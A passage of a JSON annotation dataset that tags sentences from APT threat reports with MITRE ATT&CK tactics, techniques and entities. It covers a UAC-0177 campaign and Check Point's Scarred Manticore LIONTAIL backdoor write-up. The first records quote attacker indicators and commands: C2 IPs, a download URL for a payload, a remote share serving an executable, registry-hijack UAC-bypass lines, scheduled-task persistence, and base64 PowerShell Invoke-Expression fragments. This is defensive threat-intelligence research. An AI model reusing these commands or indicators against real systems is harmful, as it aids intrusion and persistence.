be878c37bfab2d6ea7b460d74312523317e3377927222f87aa3ce92f6ebc5bcd", "sentence_text": "Worm 0e38564d3cff4859e4418ff3b1c57506 096a62c27bc5a7c860f72927a5435c8a874044d2412be549817a8f7d13ba93cd Ties 4febae6a56361fa83265fa07f50a1880 0d43898207e1c83da0844e5511a58ea051f4672f0c96a77a8437b326ce9b4547 Stylish participants e0f074f4d3dcd3b2b59c0c162d83ff57 52a25828f2df09476ac25ab2fd12a9b7b47be2a2ef42f58641a4dd1e0dab2aaa Ka aae9e3b0ccd99846c3c5606a3164b3bf d78a77857dcfddf9f7af0b7c0fccb181b12b69587e1e60a3d96be1b8a7ce3b52 Injection 2/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p3-s14-f29e1b", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 3, "sentence_id": 14, "context_before": "Worm 0e38564d3cff4859e4418ff3b1c57506 096a62c27bc5a7c860f72927a5435c8a874044d2412be549817a8f7d13ba93cd Ties 4febae6a56361fa83265fa07f50a1880 0d43898207e1c83da0844e5511a58ea051f4672f0c96a77a8437b326ce9b4547 Stylish participants e0f074f4d3dcd3b2b59c0c162d83ff57 52a25828f2df09476ac25ab2fd12a9b7b47be2a2ef42f58641a4dd1e0dab2aaa Ka aae9e3b0ccd99846c3c5606a3164b3bf d78a77857dcfddf9f7af0b7c0fccb181b12b69587e1e60a3d96be1b8a7ce3b52 Injection 2/6", "sentence_text": "6041845b2fe9dfb4b06fed8ec8a05295\n9277d96732034e91501a8ef9be26a05c63db0be38b50e1d11d4ee3a38929ec2e Emperor\n53b204f96e93b70a528b88bedfd6b794\n8e0967dbee0583704b4b9718521b04e53edc84ddc61456e6d9e38c5522c9cb46 Compound\nBathrooms\n848164d084384c49937f99d5b894253e\nf58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3 VideoMagic.pif\nce460418bab48b1e78b3bf611aa34f99\nd28975157f2af26766fcbdab8ca5a68bd5bbf1331cef1107424d0400b400ed50 remcos.exe\nNetwork:\n3/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p4-s15-ab5d48", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 4, "sentence_id": 15, "context_before": "6041845b2fe9dfb4b06fed8ec8a05295\n9277d96732034e91501a8ef9be26a05c63db0be38b50e1d11d4ee3a38929ec2e Emperor\n53b204f96e93b70a528b88bedfd6b794\n8e0967dbee0583704b4b9718521b04e53edc84ddc61456e6d9e38c5522c9cb46 Compound\nBathrooms\n848164d084384c49937f99d5b894253e\nf58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3 VideoMagic.pif\nce460418bab48b1e78b3bf611aa34f99\nd28975157f2af26766fcbdab8ca5a68bd5bbf1331cef1107424d0400b400ed50 remcos.exe\nNetwork:\n3/6", "sentence_text": "\\\\89[.]23.98.22\\LN\\\n\\\\89[.]23.98.22\\LN\\GB.exe\n(tcp)://45[.]87.155.41:8080\n(tcp)://45[.]87.155.41:465\n(tcp)://45[.]87.155.41:54550\n(tcp)://45[.]87.155.41:80\n(tcp)://45[.]87.154.153:80\n(tcp)://45[.]87.154.153:8080\n(tcp)://101[.]99.75.16:80\n(tcp)://101[.]99.75.16:8080\n(tcp)://101[.]99.75.16:465\n(tcp)://101[.]99.75.145:465\n(tcp)://101[.]99.75.145:80\n(tcp)://94[.]131.102.115:80\n(tcp)://94[.]131.102.117:80\n(tcp)://94[.]131.102.119:80\n(tcp)://94[.]131.102.122:80\n(tcp)://94[.]131.102.124:80\n(tcp)://101[.]99.75.145:8081\n(tcp)://101[.]99.75.147:8081\n(tcp)://101[.]99.75.14:8081\n(tcp)://101[.]99.75.16:54550\n(tcp)://101[.]99.75.16:8081\n(tcp)://45[.]87.155.41:8081\n(tcp)://94[.]131.102.115:54550\n(tcp)://95[.]164.35.143:8081\n(tcp)://95[.]164.35.174:54550\n(tcp)://95[.]164.35.174:8081\n(tcp)://95[.]164.35.234:8081\n101[.]99.75.14\n101[.]99.75.145\n101[.]99.75.147\n101[.]99.75.16\n45[.]87.154.153\n45[.]87.155.41\n81[.]19.149.130\n89[.]23.98.22\n94[.]131.102.115\n94[.]131.102.117\n94[.]131.102.119\n94[.]131.102.122\n94[.]131.102.124\n95[.]164.35.143\n95[.]164.35.174\n95[.]164.35.234\nhXXps://bitbucket[.]org/olegovich-007/777/downloads/wsuscr.exe\nHosts:\n4/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s16-93337b", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 16, "context_before": "\\\\89[.]23.98.22\\LN\\\n\\\\89[.]23.98.22\\LN\\GB.exe\n(tcp)://45[.]87.155.41:8080\n(tcp)://45[.]87.155.41:465\n(tcp)://45[.]87.155.41:54550\n(tcp)://45[.]87.155.41:80\n(tcp)://45[.]87.154.153:80\n(tcp)://45[.]87.154.153:8080\n(tcp)://101[.]99.75.16:80\n(tcp)://101[.]99.75.16:8080\n(tcp)://101[.]99.75.16:465\n(tcp)://101[.]99.75.145:465\n(tcp)://101[.]99.75.145:80\n(tcp)://94[.]131.102.115:80\n(tcp)://94[.]131.102.117:80\n(tcp)://94[.]131.102.119:80\n(tcp)://94[.]131.102.122:80\n(tcp)://94[.]131.102.124:80\n(tcp)://101[.]99.75.145:8081\n(tcp)://101[.]99.75.147:8081\n(tcp)://101[.]99.75.14:8081\n(tcp)://101[.]99.75.16:54550\n(tcp)://101[.]99.75.16:8081\n(tcp)://45[.]87.155.41:8081\n(tcp)://94[.]131.102.115:54550\n(tcp)://95[.]164.35.143:8081\n(tcp)://95[.]164.35.174:54550\n(tcp)://95[.]164.35.174:8081\n(tcp)://95[.]164.35.234:8081\n101[.]99.75.14\n101[.]99.75.145\n101[.]99.75.147\n101[.]99.75.16\n45[.]87.154.153\n45[.]87.155.41\n81[.]19.149.130\n89[.]23.98.22\n94[.]131.102.115\n94[.]131.102.117\n94[.]131.102.119\n94[.]131.102.122\n94[.]131.102.124\n95[.]164.35.143\n95[.]164.35.174\n95[.]164.35.234\nhXXps://bitbucket[.]org/olegovich-007/777/downloads/wsuscr.exe\nHosts:\n4/6", "sentence_text": "\"%WINDIR%\\System32\\reg.exe\" add HKCU\\Software\\Classes\\ms-settings\\CurVer /d .omg /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s17-2c16c1", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 17, "context_before": "\"%WINDIR%\\System32\\reg.exe\" add HKCU\\Software\\Classes\\ms-settings\\CurVer /d .omg /f", "sentence_text": "\"%WINDIR%\\System32\\reg.exe\" delete HKCU\\Software\\Classes\\.omg\\ /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s18-b51267", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 18, "context_before": "\"%WINDIR%\\System32\\reg.exe\" delete HKCU\\Software\\Classes\\.omg\\ /f", "sentence_text": "\"%WINDIR%\\System32\\reg.exe\" delete HKCU\\Software\\Classes\\ms-settings\\ /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s19-eeff96", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 19, "context_before": "\"%WINDIR%\\System32\\reg.exe\" delete HKCU\\Software\\Classes\\ms-settings\\ /f", "sentence_text": "\"%WINDIR%\\System32\\reg.exe\" add HKCU\\Software\\Classes\\.omg\\Shell\\Open\\command /d", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s20-a0d5ef", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 20, "context_before": "\"%WINDIR%\\System32\\reg.exe\" add HKCU\\Software\\Classes\\.omg\\Shell\\Open\\command /d", "sentence_text": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\persistent2\\test2.exe /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s21-3a415a", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 21, "context_before": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\persistent2\\test2.exe /f", "sentence_text": "%APPDATA%\\wsuscr.exe %", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s22-e094d2", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 22, "context_before": "%APPDATA%\\wsuscr.exe %", "sentence_text": "TEMP%\\IXP000.TMP\\test2.bat", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s23-7b3d00", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 23, "context_before": "TEMP%\\IXP000.TMP\\test2.bat", "sentence_text": "%TEMP%\\persistent2\\test2.exe cmd /c \"test2.bat\" cmd /c schtasks.exe /create /tn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s25-ddc76c", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 25, "context_before": "\"Watson\" /tr", "sentence_text": "\"wscript '%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.js'\" /sc minute /mo 3 /F", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s27-f3e32f", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 27, "context_before": "cmd /k", "sentence_text": "cmd < Bathrooms & exit cmd /k echo", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s28-fa53d9", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 28, "context_before": "cmd < Bathrooms & exit cmd /k echo", "sentence_text": "[InternetShortcut] > \"%APPDATA%\\Microsoft\\Windows\\Start", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s29-61afed", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 29, "context_before": "[InternetShortcut] > \"%APPDATA%\\Microsoft\\Windows\\Start", "sentence_text": "Menu\\Programs\\Startup\\MarketWise.url\" & echo URL=\"%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.js\" >> \"%APPDATA%\\Microsoft\\Windows\\Start", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s30-127431", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 30, "context_before": "Menu\\Programs\\Startup\\MarketWise.url\" & echo URL=\"%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.js\" >> \"%APPDATA%\\Microsoft\\Windows\\Start", "sentence_text": "Menu\\Programs\\Startup\\MarketWise.url\" & exit cmd.exe \"%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.pif\" \"%LOCALAPPDATA%\\Insightful Markets Technologies\\A cmd.exe /S /D", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s31-abac66", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 31, "context_before": "Menu\\Programs\\Startup\\MarketWise.url\" & exit cmd.exe \"%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.pif\" \"%LOCALAPPDATA%\\Insightful Markets Technologies\\A cmd.exe /S /D", "sentence_text": "/c\" echo F \" cmd.exe /c res.bat && test2.exe dvwsus-SFNWWW exel-3RO5G3 explorer.exe \"\\\\89.23.98.22\\LN\\\" powershell -Command \" [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s35-8bcc26", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 35, "context_before": "GetString([System.", "sentence_text": "Convert]::FromBase64String('JABwAHcA |Invoke-Expression\" powershell -Command \"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p5-s40-84878a", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 5, "sentence_id": 40, "context_before": "GetString([System.", "sentence_text": "Convert]::FromBase64String('ZgB1AG4A | Invoke-Expression\" powershell.exe -Command Stop-Process -Name explorer wscript \"%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.js\" wscript.exe \"%LOCALAPPDATA%\\Insightful Markets Technologies\\MarketWise.js\" xcopy /s test2.exe \"%TEMP%\\persistent2\\test2.exe\" >NULL Graphic images 5/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p6-s42-2040ce", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 6, "sentence_id": 42, "context_before": "Fig.", "sentence_text": "Example of a chain of damage Previous Modus operandi UAC-0177 (JokerDPR) on the example of one of the cyber attacks (CERT- UA#8290)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p1-s1-952e6c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "From Albania to the Middle East: The Scarred Manticore is Listening research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening October 31, 2023 Key Findings Check Point Research (CPR) is monitoring an ongoing Iranian espionage campaign by Scarred Manticore, an actor affiliated with the Ministry of Intelligence and Security (MOIS).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p1-s2-ea64f0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "From Albania to the Middle East...", "sentence_text": "The attacks rely on LIONTAIL, an advanced passive malware framework installed on Windows servers.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "The malware is installed on Windows servers.", "entities": [ { "text": "LIONTAIL", "start": 20, "end": 28, "label": "MalwareTool" }, { "text": "installed on Windows servers", "start": 68, "end": 96, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p1-s3-484e03", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "The attacks rely on LIONTAIL...", "sentence_text": "For stealth purposes, LIONTIAL implants utilize direct calls to Windows HTTP stack driver HTTP.sys to load memory-residents payloads.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The implants load payloads into memory using HTTP.sys.", "entities": [ { "text": "LIONTIAL implants", "start": 22, "end": 39, "label": "MalwareTool" }, { "text": "utilize direct calls", "start": 40, "end": 60, "label": "Action" }, { "text": "load memory-residents payloads", "start": 102, "end": 132, "label": "Action" }, { "text": "HTTP.sys", "start": 90, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p1-s4-4dfc3f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "For stealth purposes, LIONTIAL implants utilize direct calls to Windows HTTP stack driver HTTP.sys to load memory-residents payloads.", "sentence_text": "As part of mutual efforts with Sygnia‘s Incident Response team, multiple forensics tools and techniques were leveraged to uncover additional stages of the intrusions and the LIONTAIL framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p1-s5-6cfa9c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "As part of mutual efforts with Sygnia‘s Incident Response team, multiple forensics tools and techniques were leveraged to uncover additional stages of the intrusions and the LIONTAIL framework.", "sentence_text": "The current campaign peaked in mid-2023, going under the radar for at least a year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p1-s6-969fc2", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "The current campaign peaked...", "sentence_text": "Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "The threat actor uses backdoors to attack Windows servers.", "entities": [ { "text": "Scarred Manticore", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "utilizing a variety of IIS-based backdoors", "start": 66, "end": 108, "label": "Action" }, { "text": "attack Windows servers", "start": 112, "end": 134, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p1-s7-808f0d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers.", "sentence_text": "While the main motivation behind Scarred Manticore’s operation is espionage, some of the tools described in this report have been associated with the MOIS-sponsored destructive attack against Albanian government infrastructure (referred to as DEV- 0861).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p1-s8-1f90a6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "While the main motivation...", "sentence_text": "LIONSTAIL’s implants utilize undocumented functionalities of the HTTP.sys driver to extract payloads from incoming HTTP 1/31", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The implants extract payloads from HTTP traffic.", "entities": [ { "text": "LIONSTAIL’s implants", "start": 0, "end": 20, "label": "MalwareTool" }, { "text": "utilize undocumented functionalities", "start": 21, "end": 57, "label": "Action" }, { "text": "extract payloads", "start": 84, "end": 100, "label": "Action" }, { "text": "HTTP.sys", "start": 65, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p2-s10-540942", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "traffic.", "sentence_text": "Multiple observed variants of LIONTAIL-associated malware suggest Scarred Manticore generates a tailor-made implant for each compromised server, allowing the malicious activities to blend into and be undiscernible from legitimate network traffic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s11-53472b", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "Multiple observed variants of LIONTAIL-associated malware suggest Scarred Manticore generates a tailor-made implant for each compromised server, allowing the malicious activities to blend into and be undiscernible from legitimate network traffic.", "sentence_text": "We currently track this activity as Scarred Manticore, an Iranian threat actor that is most closely aligned with DEV-0861.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s12-a64061", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "We currently track this activity as Scarred Manticore, an Iranian threat actor that is most closely aligned with DEV-0861.", "sentence_text": "Although the LIONTAIL framework itself appears to be unique and bears no clear code overlaps with any known malware family, other tools used in those attacks overlap with previously reported activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s13-6cf7d3", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Although the LIONTAIL framework itself appears to be unique and bears no clear code overlaps with any known malware family, other tools used in those attacks overlap with previously reported activities.", "sentence_text": "Most notably, some of those were eventually linked back to historic OilRig or OilRig-affiliated clusters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s14-73954d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "Most notably, some of those were eventually linked back to historic OilRig or OilRig-affiliated clusters.", "sentence_text": "The evolution in the tools and capabilities of Scarred Manticore demonstrates the progress the Iranian actors have undergone over the last few years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s15-1cc35f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "The evolution in the tools and capabilities of Scarred Manticore demonstrates the progress the Iranian actors have undergone over the last few years.", "sentence_text": "The techniques utilized in recent Scarred Manticore operations are notably more sophisticated compared to previous activities CPR has tied to Iran.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s16-0bc3ca", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "The techniques utilized in recent Scarred Manticore operations are notably more sophisticated compared to previous activities CPR has tied to Iran.", "sentence_text": "In this article, we provide a technical analysis of the latest tools and the evolution of Scarred Manticore’s activity over time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s17-c5f1f8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "In this article, we provide a technical analysis of the latest tools and the evolution of Scarred Manticore’s activity over time.", "sentence_text": "While we finalized this blog post, a technical analysis of part of this activity was published by fellow researchers from Cisco Talos.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s18-3aa935", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "While we finalized this blog post, a technical analysis of part of this activity was published by fellow researchers from Cisco Talos.", "sentence_text": "LIONTAIL Framework\nLIONTAIL is a malware framework that includes a set of custom shellcode loaders and memory resident shellcode payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s19-e632b2", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "LIONTAIL Framework\nLIONTAIL is a malware framework that includes a set of custom shellcode loaders and memory resident shellcode payloads.", "sentence_text": "One of its components is the LIONTAIL backdoor, written in C.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s20-c1ab67", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "One of its components is the LIONTAIL backdoor, written in C.", "sentence_text": "It is a lightweight but rather sophisticated passive backdoor installed on Windows servers that enables attackers to execute commands remotely through HTTP requests.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "The backdoor executes commands remotely via HTTP requests.", "entities": [ { "text": "installed on Windows servers", "start": 62, "end": 90, "label": "Action" }, { "text": "execute commands remotely", "start": 117, "end": 142, "label": "Action" }, { "text": "HTTP requests", "start": 151, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p2-s21-c815b6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "It is a lightweight but rather sophisticated passive backdoor installed on Windows servers that enables attackers to execute commands remotely through HTTP requests.", "sentence_text": "The backdoor sets up listeners for the list of URLs provided in its configuration and executes payloads from requests sent by attackers to those URLs.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "The backdoor sets up listeners on configured URLs and executes payloads from attacker-sent requests.", "entities": [ { "text": "The backdoor", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "sets up listeners for the list of URLs", "start": 13, "end": 51, "label": "Action" }, { "text": "executes payloads from requests sent by attackers", "start": 86, "end": 135, "label": "Action" }, { "text": "URLs", "start": 47, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p2-s22-ee84d8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "The backdoor sets up listeners for the list of URLs provided in its configuration and executes payloads from requests sent by attackers to those URLs.", "sentence_text": "The LIONTAIL backdoor components are the main implants utilized in the latest Scarred Manticore intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p2-s23-3e5cb6", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "The LIONTAIL backdoor components are the main implants utilized in the latest Scarred Manticore intrusions.", "sentence_text": "Utilizing access from a publicly facing server, the threat actor chains a set of passive implants to access internal resources.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Use access from a public-facing server to chain passive implants and move into internal resources.", "entities": [ { "text": "Utilizing access from a publicly facing server", "start": 0, "end": 46, "label": "Action" }, { "text": "chains a set of passive implants", "start": 65, "end": 97, "label": "Action" }, { "text": "passive implants", "start": 81, "end": 97, "label": "MalwareTool" }, { "text": "access internal resources", "start": 101, "end": 126, "label": "Action" } ] }, { "uid": "aptnotes-04_aptnotes_report-p2-s24-b6d48e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 2, "sentence_id": 24, "context_before": "Utilizing access from a publicly facing server, the threat actor chains a set of passive implants to access internal resources.", "sentence_text": "The internal instances of the LIONTAIL 2/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p3-s25-4ff6ff", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "The internal instances of the LIONTAIL 2/31", "sentence_text": "LIONTAIL Loaders\nInstallation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p3-s26-5a71a8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "LIONTAIL Loaders\nInstallation", "sentence_text": " 2 methods of backdoor installation on the compromised Windows servers:\nstandalone executables, and DLLs loaded through search order hijacking by Windows services or legitimate processes.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "The backdoor is installed via executables and DLL search order hijacking.", "entities": [ { "text": "backdoor installation", "start": 14, "end": 35, "label": "Action" }, { "text": "DLLs loaded through search order hijacking", "start": 100, "end": 142, "label": "Action" }, { "text": "Windows servers", "start": 55, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p3-s27-b12212", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "We observed 2 methods of backdoor installation on the compromised Windows servers:\nstandalone executables, and DLLs loaded through search order hijacking by Windows services or legitimate processes.", "sentence_text": "When installed as a DLL, the malware exploits the absence of some DLLs on Windows Server OS distributions: the backdoor is dropped to the system folder C:\\windows\\system32 as wlanapi.dll or wlbsctrl.dll.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" }, { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "The malware exploits missing DLLs and drops a backdoor DLL into the system32 directory using legitimate DLL names.", "entities": [ { "text": "the malware", "start": 25, "end": 36, "label": "MalwareTool" }, { "text": "exploits the absence of some DLLs", "start": 37, "end": 70, "label": "Action" }, { "text": "dropped to the system folder C:\\windows\\system32", "start": 123, "end": 171, "label": "Action" }, { "text": "C:\\windows\\system32", "start": 152, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "wlanapi.dll", "start": 175, "end": 186, "label": "Infrastructure_Indicator" }, { "text": "wlbsctrl.dll", "start": 190, "end": 202, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p3-s28-a8ddda", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "When installed as a DLL, the malware exploits the absence of some DLLs on Windows Server OS distributions: the backdoor is dropped to the system folder C:\\windows\\system32 as wlanapi.dll or wlbsctrl.dll.", "sentence_text": "By default, neither of these exist on Windows Server installations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p3-s29-cb62b0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "By default, neither of these exist on Windows Server installations.", "sentence_text": 